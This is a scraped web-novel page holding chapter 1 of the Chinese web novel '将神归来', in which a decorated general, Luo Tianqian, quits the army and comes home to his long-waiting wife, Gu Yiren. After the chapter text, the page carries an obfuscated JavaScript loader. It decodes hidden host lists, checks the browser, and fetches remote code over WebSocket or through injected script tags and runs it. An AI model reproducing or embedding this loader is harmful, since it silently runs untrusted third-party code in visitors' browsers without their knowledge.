笔趣阁

字:
关灯 护眼
笔趣阁 > 将神归来 > 第1章

第1章

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“王座,您真的不能留下吗......”近乎两米的壮汉跪在地上,如同一座小山。
  他满脸惶恐不安。
  罗天堑轻声说道:“我无愧于国,却有愧于家,边关平定,我应该回家了。”
  贺子龙眼中哀求:“可王座,百万儿郎若是知道你离开,军心大乱啊。”
  罗天堑脱下了战袍披风,淡笑道:“军中可以少一个天堑将神,还有无数人可以成为将神。”
  轰隆!
  贺子龙重重的磕头:“求王座留下!”
  轰隆!
  第二声闷响,贺子龙的额头已然血红一片。
  第三声闷响,地面上都多出了一片血迹!
  ......
  从戎十年,罗天堑只回家过一次。
  五年前父亲病危,他回家探亲。
  为了完成父亲的心愿,也为了一个等待了自己五年的女人。
  他领了结婚证。
  当时他已然决定放弃军旅生涯,可边关战事突起,他匆匆赶回战场。
  一晃眼又是五年。
  他终于可以放下这刀枪。真正的回家看看。
  杨柳依依,白絮纷飞。
  时值四月初,天气还有一丝幽冷。
  顾伊人紧了紧风衣领口,张望着高铁站的通道。
  白皙的肌肤透着一丝绯红,清澈的眼眸里,更有茫然慌乱。
  “五年之后,又是五年,顾伊人为什么你还能等得下去。”
  “为什么,你还是这么贱?”
  “你记住,如果他再走,那就给他离婚协议书。”
  凌乱的发丝,精巧的鹅蛋脸,纤瘦的身材笼罩在风衣下,更是我见尤怜。
  她是顾家的长女,第一财团的掌上明珠,雅都市所有男人的梦中情人。
  五年前,她嫁给了罗天堑,几乎被逐出家族,虽说没有除名,但也没了任何地位。
  这五年的压力,嘲讽,甚至是谩骂,她艰难承受。
  她想了无数次,这个婚应该离了。
  可她又无数次放不下这一段感情。
  “我,回来了。”低沉的声音响起。
  下一刻,顾伊人就看见了那张等待了五年之后又五年的脸。
  稚嫩早已消散,面庞之上除了风霜外,就是刚毅。
  顾伊人很努力忍住眼泪,可还是泪流满面。
  ”你,为什么不再等十年再回来?”
  哽咽的声音,带着深深的幽怨。
  顾伊人扬起巴掌,最后却没有落下去。
  听着话语中的反讽,看着顾伊人脸上的悲伤,罗天堑坚若磐石的心都开始阵痛。
  “我对不起你,我不会走了。”罗天堑轻叹。
  顾伊人呆住了。
  你不走了?你不走了,我这张离婚协议书给谁?
  我和谁离婚?
  最终,顾伊人没有拿出来离婚协议书,她沉默的走向了路旁的车子。
  回罗家的路上,两人没有说一句话。
  罗天堑不知道如何开口,不知如何来补偿自己愧对十年的女人。
  顾伊人不知道怎么说话,她没有想到,罗天堑竟然真的不走了。
  罗家宅院外。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA4NQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x4d\x4a\x52\x5a\x74\x53\x42\x70\x63\x77']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vYWpmMmpkajlmajI5LmJiZGlhbbnppc2h1LmNvbbQ==','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};